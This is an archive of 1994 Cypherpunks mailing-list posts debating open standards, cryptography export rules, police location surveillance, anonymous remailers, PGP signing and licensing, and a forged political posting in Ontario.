Open standards are great, but a camel is a horse designed by a committee. CERN came down from the mountain top, and decreed what HTML and HTTP should be, and that was a truly open and successful standard. Very few such standards have emerged from committees. If anything Netscape is paying too much attention to official committees and too little attention to reality. (for example their irrelevant ID protocol for secure transfer.) and if Netscape descends from the mountain and proclaims a superset of HTML and additional HTTP behavior, then provided that they are open and retain backward compatibility, that is the way to go. If their proclamation is flawed, they will not get away with it. If their proclamation is OK, being developed from practice instead of bureaucratic politicking, then they will get away with it. For example consider the standards committee on SQL. It is just a political issue: What companies on the standards committee decide to do is deemed good, what others do is deemed bad. As a result the SQL "standard" is now just a random pile that does not make any sense. This is OK when the standards committee is dominated by those on the leading edge of technology, but irrelevant and harmful when they are lagging. A few years back, when the standards for new RAM chips were debated, those who were lagging decreed that any ram chip beyond their technology to make was deemed to be non standard. Needless to say, today we all use non standard RAM chips. A similar thing occurred with the move to higher floppy disk densities. Those who could not double, decreed the next density increase would not be to double the previous density. Again, the floppy standard was non standard. In short, when the leading edge company dominates the standards committee, it is of little use, when the old companies dominate the standards committee, it is actually harmful. 
-- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jdwilson at gold.chem.hawaii.edu Sun Dec 11 17:34:21 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sun, 11 Dec 94 17:34:21 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: <199412120139.UAA26699@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Mon, 12 Dec 1994, Ian Farquhar wrote: > Even so, I really wonder if the export of cryptography ON PAPER but in a > machine-readable form would be in violation of ITAR? If anyone has one of > these old scanner, it might very well be worth trying. And what about using MICR ink? Paper-floppy (sort of)? - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuprCoZzwIn1bdtAQE1fQF+KJn5Hfh3guv4/ElbppMv6RkkZCGjBKSn PvzVDBCbvdueYJwp5AAbZBI2ycCFQizh =ZxaK -----END PGP SIGNATURE----- From rah at shipwright.com Sun Dec 11 17:52:46 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 11 Dec 94 17:52:46 PST Subject: Real-time surveillance of the police Message-ID: <199412120151.UAA15784@zork.tiac.net> At 3:14 PM 12/11/94 -0800, Timothy C. 
May wrote: >I don't plan to say much more, and won't be playing the "Twenty >Questions" game, but the system does _not_ use satellites or anything >of that sort. Satellites up the ante considerably, and aren't even >needed. No invitation to twenty questions intended. You could have sat quietly and let me make a fool of myself (or not) without further comment. Since you have... I believe if you reread what I wrote, I said that the accuracy with satellites was considerable using a pretty small box to begin with (for instance, the Geostar satellite-based system's predicted accuracy was about 6 inches in two dimensions and two meters in three dimensions), but that with local antennae (say every block or so) you could have pretty phenomenal accuracy the the signal was possible. If you put embedded antennae in the walls (we put wires in walls already, yes?) you could get accuracy enough to precision mill with ;-). So, given your reference to ground-based radio, I think we're in "violent agreement here". The application of this to physical commerce has been discussed here before. Just pick up a tagged item and walk out of a store with it. It could be made anonymous, I bet. > >Radio is enough to get 1% positional accuracy (or better) and radio >can have better coverage in many places that GPS-like systems can't reach. > >> the backs of commerce. The only thing which saved GPS for mere mortals like >> us was the MIC's usual severe underestimate of Grove's Law and the > ^^^^^^^^^^^ >> exponential cost effectiveness of integrated circuits over time. >A minor nit, but that's "Moore's Law, A major nit, in my book, and one I'm standing on the wrong side of. I got Andy Grove confused with Gordon Moore. It must be because they look so much alike. :-). 
Grovelling in your general direction as always, Bob Hettinga ;-) ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From nzook at bga.com Sun Dec 11 18:49:33 1994 From: nzook at bga.com (Nathan Zook) Date: Sun, 11 Dec 94 18:49:33 PST Subject: Our Storm Brewing? In-Reply-To: <199412112338.PAA18920@jobe.shell.portal.com> Message-ID: Wouldn't this be a case to make for digital signatures? TRY to forge my 4K key. PLEASE!! Nathan From cactus at seabsd.hks.net Sun Dec 11 19:06:13 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sun, 11 Dec 94 19:06:13 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: <199412120311.WAA27554@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Lucky Green wrote: >Which brings us back to the news -> mail gateway. There has to be a better >way. I don't see a problem. Broadly put, news is broadcast e-mail. There are many sites which in fact do not distinguish between the two, the most notable of which is CMU's Andrew Message System: the admins of such systems believe the "experiment" to be an all-around success. If you want message A to get from site B to site C without a clear trail, you've got to broadcast. It's that simple. It isn't a very big problem that site B put something into the flow, so mail to news isn't a weak point: an article can be injected at the remailer's site without compromising the channel to traffic analysis. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. 
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuu/KyoZzwIn1bdtAQHDbwGAgkIM2IZ3W1NtzzgNbpCkjpfJwPMVCMG2 ed0TnOHKU7ws4oUrHpddC6pAjzmk22uO =2zh3 -----END PGP SIGNATURE----- From roy at cybrspc.mn.org Sun Dec 11 19:55:59 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sun, 11 Dec 94 19:55:59 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: <199412120017.QAA18598@netcom14.netcom.com> Message-ID: <941211.205843.4t8.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, tcmay at netcom.com writes: >> Around the mid 1980's a rather interesting device appeared. It was >> essentially an automated scanner for high-density barcodes. > "Cauzin Softstrips" was the product, as I recall. I wouldn't use the > word "quite" in "It never quite caught on," except in irony, as I'm > pretty sure essentially _no_ such machines were sold. Maybe a few, but > not many more. I remember the product, including the test strip printed in BYTE that caused a flurry of "what's this?" letters. I'm sure Tim is right about very few readers being sold. But I think that 2 other things influenced the Cauzin's demise. There was the steady drop in magnetic media prices that eroded the potential savings in storage on paper. But I think the more important event was that Cauzin was bought by Kodak. This was at a time when Kodak was getting into mag media pretty heavily (both computer disks and video tape). I always sort of assumed Kodak bought Cauzin to rid themselves of some competition. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org "Governments find it notoriously difficult to work with people that they cannot shoot." -- James A. 
Donald -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuu96Rvikii9febJAQFy+AP/ZyutzrPSt9YiGxmGsX51lMWsOoU5giXU pGo8VhYDDZ3uIkR5PLPElMMgRfjVM7AMVcQr+3zxab2i+ihxr9fga7j2QqSnOGk9 pBXuDdrI84i7ChsmNzUxWtN2oTKg52cVxC+GNAmrY2mu25oJXTB6M/ntc+/mgk5L wMrHpx129sE= =rl8a -----END PGP SIGNATURE----- From sandfort at crl.com Sun Dec 11 20:12:49 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 11 Dec 94 20:12:49 PST Subject: Real-time surveillance of the police Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Michael Crawford wrote about my article in the December '94 issue of Wired, ("Watching the Detectives", p. 141): ... The advantage for society is that the cop's behaviour, such as billy-club swinging velocity, can be monitored. It could detect gunfire, too, ... This would work to the extent that the equipment is actually mounted on the cop it claims to belong to, so some manner of authentication would be needed. Fleming told me that the localizers would also take biometric readings to monitor the cop's physical status. It turns out that individual biometric readings vary significantly from person to person. It would be very hard for one cop (or a dog, suspect, whatever) to pose as someone else by wearing his localizer. ... Yes, that's right - keep surveillance cameras going on _yourself_. If you're not doing anything illegal, you've got nothing to fear from taping everything you do. I don't like this idea one bit. I agree with Tim that it is the first step on a very slippery slope. ... I expect that it will be difficult to convince our Nation's Finest to adopt this new technology - though I'm sure they'd be happy to apply it to parolees and those serving on probation.... It would be difficult for the cops to reject it. After all, it definitely benefits vast majority of good cops. 
It only hurts that teensy-tiny minority who violate people's rights. Right? Michael also argued that it might be more easily sold to private security firms for legal liability reasons. This argument is even more persuasive for police officers. Cities routinely pay astronomical settlements, or fight expensive law suits, arising out of alleged incidents of police misconduct. Frivolous lawsuits would be quickly thrown out of court. Rogue cops would be identified and thrown off the force. Works for me. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From FRODO at uhura.trinity.toronto.edu Sun Dec 11 20:21:33 1994 From: FRODO at uhura.trinity.toronto.edu (FRODO at uhura.trinity.toronto.edu) Date: Sun, 11 Dec 94 20:21:33 PST Subject: Hal Finney & Bob Rae and Ontario's Parliament Message-ID: -----BEGIN PGP SIGNED MESSAGE----- All lines between this and the PGP header may be suspect. This is what I posted to Ont.general this evening. Those who are interested in getting more information about the kerfuffle in Toronto over the posting through an anonymous remailer might want to check out http://www.earth.org/~newsbites (I believe that's it. You might want to try without the directory.) Which contains muchos information, including the discussion going through the newsgroups, and the Globe and Mail article.) The article below is what I posted to ont.general myself this evening. Seemed a good chance to proselytize... ;) It was signed, as below, with my shame-facedly new PGP key, though the signature file was slightly different. (I've managed to grab the real .sig off my unix account. As I noted, one of my e-mail sites is currently not sending mail.) Article begins: Short note. Mike Harris' behavior in the legislature is the symptom of either malevolence or incompetence or both. Either way, he won't be getting my vote. On the other hand, there are ways of protecting yourself from forgeries such as this. 
You can't stop people from sending such mail, but you *can* make mail that you write unique. PGP, a fully legal encryption program which the Ontario government could use FOR FREE, has a signing protocol so that recipients can check to make sure that your mail did indeed come from you. If you make it a standard that you don't send unsigned mail, and don't post to newsgroups without signing what you send, unsigned mail will be suspect. In this case, the mail went through the cypherpunks anonymous remailer at portal.com. I trust that whoever sent the mail had enough computer sense to have chained it through several remailers, if little else. We've been through the arguments about "yes there was a disclaimer," but people seem to be ignorant of the fact that there are already ways of protecting yourself from misrepresentation on the net. The University of Toronto's CDF facility is currently having a little problem with sending mail (ie, it can't), so I'm posting this instead of sending it directly to Bob Rae. Perhaps we should send him PGP for Christmas? Richard - -- Richard Martin ChemPhysCompSci 9T7+PEY = 9T8 g4frodo at cdf Trinity College University of Toronto SVW92 martinrd at gpu.utcc My opinions, when not poached. (or fried) frodo at uhura.trinity [Tack a "toronto.edu" on the end of each e-mail address. I'm faced with a mailing program with draconian margin policies.] -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCVAgUBLuvVl6+lG3+zwTCVAQFPdwQAtX0fh0aJuhPC1mCUAlNDDi9tV0QB0yy8 cSNIlBxVgEzTl6K0geu25CSXSGh2N4dFdh6rHMPjkMkOsfcVPFI5nXb8+zHtfFgd UxkU0mwhunyFzLCN4tm0UVKruzWmfV8bGV9EezSsRrmAeAsZwT9s5hJ3qdOnf3mn twbGIn1Eadg= =UI1+ -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Sun Dec 11 21:03:12 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 11 Dec 94 21:03:12 PST Subject: Real-time surveillance of the police Message-ID: At 11:11 PM 12/11/94, Sandy Sandfort wrote: > ... Yes, that's right - keep surveillance cameras going > on _yourself_. 
> If you're not doing anything illegal,
> you've got nothing to fear from taping everything you
> do.
>
>I don't like this idea one bit. I agree with Tim that it is the
>first step on a very slippery slope.
>
> ... I expect that it will be difficult to convince our
> Nation's Finest to adopt this new technology - though
> I'm sure they'd be happy to apply it to parolees and
> those serving on probation....
>
>It would be difficult for the cops to reject it. After all, it
>definitely benefits vast majority of good cops. It only hurts
>that teensy-tiny minority who violate people's rights. Right?

I'm not sure if you are being sarcastic here, although I don't think you are. That seems like a slippery slope all its own, there. I don't like it when someone tells me "what do you have to worry about if you aren't breaking any laws," and I don't like it when someone says that about the cops too. That argument is awfully scary.

Yeah, if the cops didn't want to accept such a thing, it might be worth calling them on their hypocrisy for applying that argument to citizens and not to police. But I don't think it would be wise to use the "what do you have to worry about if you aren't breaking any laws," argument too often.

From alano at teleport.com Sun Dec 11 21:27:19 1994
From: alano at teleport.com (Alan Olsen)
Date: Sun, 11 Dec 94 21:27:19 PST
Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal
Message-ID: <199412120527.VAA18927@desiree.teleport.com>

>In the Jan 95 issue of Dr Dobbs Journal, you will find the following:
> [stuff deleted]
>
> An article by Ron Rivest on RC5 (without code).

I could have sworn that had code with it. In checking, it has only pseudocode. My mistake... Oops.

>Remember, you can export cryptographic source code in paper form.

I wonder how it affects their FTP archives...

| "Encryption ROT13s your mind." | alano at teleport.com |
|"Would you rather be tortured by the government | Disclaimer: |
|forces or the people's liberation army?" -mklprc | Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|

From sandfort at crl.com Sun Dec 11 22:12:35 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Sun, 11 Dec 94 22:12:35 PST
Subject: Real-time surveillance of the police
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Jonathan Rochkind wrote:

... I don't like it when someone tells me "what do you have to worry about if you aren't breaking any laws," and I don't like it when someone says that about the cops too....

This misses the point I was trying to make. The first argument in favor of wiring the cops, is that it is to their benefit. It helps backup officers or medical personnel to find them. It protects them from unfounded accusations of brutality or other misconduct. It makes a permanent visual and sound recording of perps who get away. This helps in later identification.

Even with all these arguments in favor of wiring, I have a sneaking suspicion the cops will not want it. Why? Though few police would admit it publicly, my conjecture is that they know they are currently getting away with murder (sometimes literally) and would feel being wired would force them to obey the law. So my "teensy-tiny-minority" argument was offered sarcastically.

In addition, I think recording officers' shifts would show just how little work cops actually do for their pay. Wiring would really throw a money wrench in the doughnut-boys cushy deal. Cynical? You betcha.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From blancw at pylon.com Sun Dec 11 22:45:08 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Sun, 11 Dec 94 22:45:08 PST
Subject: Real-time surveillance of the police
Message-ID: <199412120645.WAA24531@deepthought.pylon.com>

Responding to msg by Michael D. Crawford:

. . .
if a street gang felt the cops were thumping their members with unwarranted enthusiasm, the gang could purchase a case of cameras at the local Price Club, and everyone could carry them to photograph the cops.
...............................................................

The first thing I imagined on reading this, was numbers of young blacks in the ghetto carrying on their shoulders - not boom boxes, but camcorders.

But next I multiplied and elaborated and exaggerated the idea of everyone protecting themselves by any and all surveillance devices possible and available, and came up with this vision of a society where membership required that everyone be amenable to being recorded on contact with anyone and their cat.

"Of course, I respect you - I just don't *trust* you."

Blanc

From lmccarth at ducie.cs.umass.edu Sun Dec 11 22:54:33 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 22:54:33 PST
Subject: alt.anonymous.messages propagation
Message-ID: <199412120659.BAA02822@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Todd Masco writes:
> Timothy C. May writes:
> # Isn't this what "alt.anonymous.messages" is all about?
> Alas, it is not available at MIT. I'll have to scrounge for a server that
> carries it (volunteerings of feeds welcome!);

Hmmm, does MIT get alt.anonymous at least ? I understand alt.anonymous was created to serve a purpose similar to that of alt.privacy.anon-server, but at the moment it's a de facto equivalent of alt.anonymous.messages. alt.anonymous is somewhat better propagated than a.a.m, from what I've heard.

You should request one or both groups from the MIT news admins. If users there want to read the group, they'll likely be quite happy to carry it.

I'm a fairly well-known regular in alt.config, and I believe I can probably recruit some prominent news admins to send booster newgroup messages for alt.anonymous.messages.
Apart from that, it's a matter of people asking their local news admins to pick up the group if they aren't already carrying it.

> Though netcom is our
> IP provider, I'd rather not get news from them.

Heh, I don't blame you. Although I heard they recently ditched alt.this.site.newgroups.everything (or something like that), they still carry virtually everything that gets newgrouped by anyone, accidentally or not.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Sun Dec 11 23:09:03 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 23:09:03 PST
Subject: Misunderstanding of Remail Headers
Message-ID: <199412120713.CAA03062@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Hal writes:
> One thing I do notice on reading the discussion in can.politics is the
> fact that despite the disclaimers in the message headers, some people
> took this as a forgery attempt on my part. I wonder if it might be
> necessary to insert disclaimers into the body of the message as
> anon.penet.fi does, at least for messages to known mail-to-news
> gateways.
>
> There was also a misperception that my remailer was an official effort
> endorsed by Portal (again, despite the disclaimers). Note that it was
> they who were contacted, not me (yet). This might suggest that it will
> not be possible to cleanly separate the remailer operators and service
> providers when problems like this arise. Both may end up being hassled
> (time will tell whether I am).

This is all too familiar to me. Although I still haven't heard the official line on the shutdown of Underdog following the Scythe spam, at least some people locally (including, crucially, my advisor) received the impression that I had forged (and authored !) the offending news articles in spite of the disclaimer headers. Furthermore, the spam might not have been a fatal blow if not for the fact that some people ignored the "complaints to " header and wrote directly to root or postmaster here. Everyone who actually wrote to me came away satisfied that I was taking appropriate action, as far as I could tell.

I'll take this opportunity to reiterate that I'm no longer operating a remailer at this address. I wrote to Matt Ghio about a week ago asking him to remove my address from remailer-pings at chaos.bsu.edu, but I suppose he's busy with school these days. That list remains frozen with information dating from Nov.22. Karl Barrus mentioned something about chaos.bsu.edu having moved to chaos.taylored.com; perhaps this is part of the reason for the snag ?

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From werner at mc.ab.com Sun Dec 11 23:13:16 1994
From: werner at mc.ab.com (tim werner)
Date: Sun, 11 Dec 94 23:13:16 PST
Subject: [cpunks] Re: public accounts / PGP / passphrases
Message-ID: <199412120712.CAA01736@sparcserver.mc.ab.com>

>Date: Mon, 5 Dec 1994 05:24:12 -0500
>From: "L. McCarthy"
>...The only solution I can imagine is to keep
>a notebook computer running Linux at work, and dial in to the DECstation
>five feet away from my desk at work. I've no idea how to convince the tech
>staff here to add a dedicated phone line to my lab for this purpose. Any
>better suggestions on using PGP safely during the workday ?

Well, for one thing you don't need a phone line in your scenario. You can probably just connect the serial port of your laptop to one of the decstation serial ports, using a null-modem cable (pins 2 and 3 swapped; 4 jumpered to 5; 6, 8, and 20 jumpered to each other; and 7 passed through, or something like that)

But I agree that the idea of buying a laptop so you can use PGP at work is odious. There must be a better way.

tw

From lmccarth at ducie.cs.umass.edu Sun Dec 11 23:34:15 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 23:34:15 PST
Subject: Hal Finney & Bob Rae and Ontario's Parliament
Message-ID: <199412120739.CAA03309@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Richard Martin writes:
> The article below is what I posted to ont.general myself this evening.
[...]
> PGP, a fully legal encryption program which the Ontario
> government could use FOR FREE,

Is this true ?
According to the PGP 2.6.1 User's Guide:
"The freeware version of PGP is only for personal, non-commercial use -- all other users in the USA and Canada must obtain a fully licensed version of PGP from ViaCrypt. [...] If you have a need to use PGP in a commercial or Government setting, and ViaCrypt has a version of PGP for your hardware platform, you should get ViaCrypt PGP."

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From MIKEINGLE at delphi.com Sun Dec 11 23:43:05 1994
From: MIKEINGLE at delphi.com (Mike Ingle)
Date: Sun, 11 Dec 94 23:43:05 PST
Subject: RSAREF for Perl Beta Testers Wanted
Message-ID: <01HKJGLZB8EQ8ZOUQR@delphi.com>

RSAREF for Perl is complete and ready for beta testing. Does anyone want to volunteer? Using it requires Unix, Perl, and RSAREF 2.0. You do not need to recompile the Perl interpreter. It gives you conventional and public-key encryption, signing, hashing, and Diffie-Hellman as one-liners in Perl.

Mike

From crawford at scruznet.com Mon Dec 12 00:05:40 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Mon, 12 Dec 94 00:05:40 PST
Subject: Real-time surveillance of the police
Message-ID: <199412120805.AAA15561@scruz.net>

Sandy Sandfort writes:
> Michael also argued that it might be more easily sold to private
> security firms for legal liability reasons.
> This argument is
> even more persuasive for police officers. Cities routinely pay
> astronomical settlements, or fight expensive law suits, arising
> out of alleged incidents of police misconduct. Frivolous
> lawsuits would be quickly thrown out of court. Rogue cops would
> be identified and thrown off the force. Works for me.

Works for me, too, and one would think that it would work for cities, but experience shows that individual cops can rack up millions of dollars in legal settlement costs and still remain on the force.

I heard some figure - this is quite vague, but hey, it's midnight - that a small handful of cops in San Francisco had cost the City tens of millions, with individual cops repeatedly causing lawsuits, without getting fired.

Why? Police unions. Settling out of court without assigning blame. City politics. Mayors that are former police chiefs. A clueless populace. Promises to do better next time.

Now, I heartily agree with you that the police should be more closely monitored, and certainly cities have ample reason to avail themselves of this, but most cities do not even avail themselves of citizen police review commissions, because of the resistance the police have to it.

In Santa Cruz, a proposal to allow an independent citizen panel to review police internal affairs investigations faced threats of lawsuits from the police union, and took _years_ to adopt. The commission we got has considerably less authority than was originally proposed. This is in a city renowned throughout the nation for its leftist politics.

If the People's Republic of Santa Cruz couldn't get a review board with real authority implemented, I doubt you'll convince the LAPD to put radio beacons on their thumping arms. Much as I think they should.

Sandy continues:
> Even with all these arguments in favor of wiring, I have a
> sneaking suspicion the cops will not want it. Why? Though few
> police would admit it publicly, my conjecture ...
Well, my knowledge is that at least one cop wouldn't go for it - the cop we caught jacking off to a magazine of ill repute, parked in his patrol car on Yerba Buena Island in San Francisco Bay. Those rhythmic wrist-movements would show an unmistakable frequency signature back at home base. He sure drove off quick. Didn't even say hello.

I say,
> Yes, that's right - keep surveillance cameras going on _yourself_. If
> you're not doing anything illegal, you've got nothing to fear from taping
> everything you do.

tcmay at netcom.com (Timothy C. May) replies:
> This scenario is a likely way that "position escrow" will evolve, from
> a voluntary escrowing (incl. timestamping, etc.). "Those with nothing
> to hide" will agree to escrow their movements...this will exculpate
> them in suspected crimes, etc. A slippery slope.

I reflected on this a bit, and decided that if one were to implement "personal surveillance", a decent solution would be to encrypt the tapes. Use DAT tape instead of a VCR, and save MPEG's or QuickTime movies that have been encrypted with IDEA.

The idea here is protection _from_ the police, to demonstrate that an officer misbehaved in the vicinity of my car, rather than to provide a record for use by the government. Needless to say, I wouldn't advertise that I actually had such a thing until I pulled the tapes out in a deposition, or sent them, decrypted, to the TV news.

Again, I'm not saying such surveillance should be imposed, supplied or encouraged by the authorities, but that one might find some benefit in installing it oneself.

Cheerio,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.
From rsalz at osf.org Mon Dec 12 00:06:45 1994
From: rsalz at osf.org (Rich Salz)
Date: Mon, 12 Dec 94 00:06:45 PST
Subject: Real-time surveillance of the police
Message-ID: <9412120802.AA11196@sulphur.osf.org>

>After the Rodney King incident, I had the notion, (which I did not act on
>to actually promote, I'm sorry to say), that organizations representing
>people that feel persecuted by the law could issue disposable cameras to
>all their members.

A couple of years ago, when he was getting one of the first Reebok international human rights awards, Peter Gabriel talked about how one of the organizations he is affiliated with was planning on doing exactly this kind of thing. If you think about it, it's not unlike the driving thrust of Amnesty International.

From cactus at seabsd.hks.net Mon Dec 12 00:29:40 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Mon, 12 Dec 94 00:29:40 PST
Subject: alt.anonymous.messages propagation
Message-ID: <199412120834.DAA04343@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

L. McCarthy wrote:
>Hmmm, does MIT get alt.anonymous at least ? I understand alt.anonymous was
>created to serve a purpose similar to that of alt.privacy.anon-server, but
>at the moment it's a de facto equivalent of alt.anonymous.messages.
>alt.anonymous is somewhat better propagated than a.a.m, from what I've heard.

Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist accounts use. And since I configured news on the machine, I'd love to hear if there are MIT servers that have a larger set than life.ai's.

>You should request one or both groups from the MIT news admins. If users there
>want to read the group, they'll likely be quite happy to carry it.

Alas, I am but a turist at MIT, though one who helps maintain the turist machine. I'll be looking at getting a real newsfeed from elsewhere, but asking the MIT newsadmins for favors isn't in the cards.
If anybody here has a bit of a stronger standing on campus, their asking would be way cool.

>I'm a fairly well-known regular in alt.config, and I believe I can probably
>recruit some prominent news admins to send booster newgroup messages for
>alt.anonymous.messages. Apart from that, it's a matter of people asking their
>local news admins to pick up the group if they aren't already carrying it.

That would be a most excellent thing to do, regardless of how it affects my situation.

- --
Todd Masco | It's difficult to be loud about keeping your enumerated
cactus at hks.net | rights when you're busy exercising your unenumerated ones.
cactus at bb.com | http://www.hks.net/~cactus/cactus.html
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From nobody at jpunix.com Mon Dec 12 01:08:10 1994
From: nobody at jpunix.com (Anonymous)
Date: Mon, 12 Dec 94 01:08:10 PST
Subject: Crypto Declaration of Independance
Message-ID: <199412120906.DAA09468@jpunix.com>

-----BEGIN PGP SIGNED MESSAGE-----

I have a proposal for you all.

I have started work on a Crypto Declaration of Independence, based on the famous American work which represents Independence.

With the incoming batch of Congress and the new year approaching, I think that it's time we assert what we believe in. We need to let people know what we stand for, and why we think it's a good idea. And with the (quasi)-recent passage of the DigiTel proposal and Freeh's comments about banning encryption, we need to wake people up.

However, asserting this to ourselves again would be akin to holding a one-person conference. We have rehashed these points amongst ourselves many times.
Therefore, I propose that we spend some time revising this work, based off the writing I will post if there is support for this idea, then sign it, and email, fax and mail it to our respective news agencies, government officials and interest groups.

However, without your support, this endeavor would be fruitless. Before I post the "beta version"/first draft of the CDoI (for lack of a better term), I want to know if you (the C'punks) will support it and help me.

Overall, I'm looking for answers to four questions:

1) Will you support and help this endeavor.
2) A target date for sending it out. First idea which came to mind: Jan 1st, 1995
3) A list of groups/people which should receive it. Government officials, news agencies, HOTtired, CPSR, EFF, ACLU, etc
and along with #3:
4) Ways for bringing it to people's attention.

I intend to keep myself anonymous during this process, so please contact me by leaving a message on this list, or mailing everything within these cutmarks to remailer at jpunix.com:

-- CUTMARK ( do not include )--
::
Encrypted: PGP

- -----BEGIN PGP MESSAGE-----
Version: 2.6.2
- -----END PGP MESSAGE-----

< please put your message to me here>
-- CUTMARK ( do not include ) --

I hope you will support me, and I will welcome any and all comments and criticism.
Asynchronous

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Mon Dec 12 01:16:37 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 12 Dec 94 01:16:37 PST
Subject: Globe and Mail Article On Forged Posting
Message-ID: <199412120921.EAA15170@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mark Terka writes:
> Ok, here is the text of the story about the "Forged Bob Rae Posting" from
> the Toronto Globe and Mail. An examination of the story only indicates how
> far our journalists and politicians have to go in understanding the Internet!

Indeed. Let's examine some of the apparent misconceptions....

[quoted text from here to the end is from Rusk & Mittelstaedt of the Globe & Mail]

> A furious Mr. Rae criticized Mr. Harris outside the legislature,
> accusing him of leading to the "Americanization of Canadian
> politics" through the use of "dirty tricks.

(ouch :)

[...]
> Ont.general is a computer bulletin board on which Internet users
